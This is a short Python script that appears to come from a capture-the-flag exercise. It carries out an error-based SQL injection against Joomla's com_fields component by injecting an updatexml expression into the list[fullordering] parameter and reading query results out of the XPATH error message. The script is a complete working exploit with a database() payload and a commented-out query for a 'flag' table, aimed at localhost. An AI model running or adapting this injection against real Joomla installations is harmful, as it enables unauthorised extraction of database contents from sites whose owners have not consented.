import requests,re

# joomla sqli

def attack(host,cmd):

	url = "http://"+host+"/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,"+cmd+"),1)"
	pre = requests.get(url)
	try:
		ret = re.findall("XPATH syntax error.*",pre.text)[0].split(";")[1][:-5]
		print(ret)
		return ret
	except Exception as e:
		return "not found"


if __name__ == '__main__':
	#pay = "(select group_concat(flag) from flag )"
	pay = "database()"
	attack("localhost:7080",pay)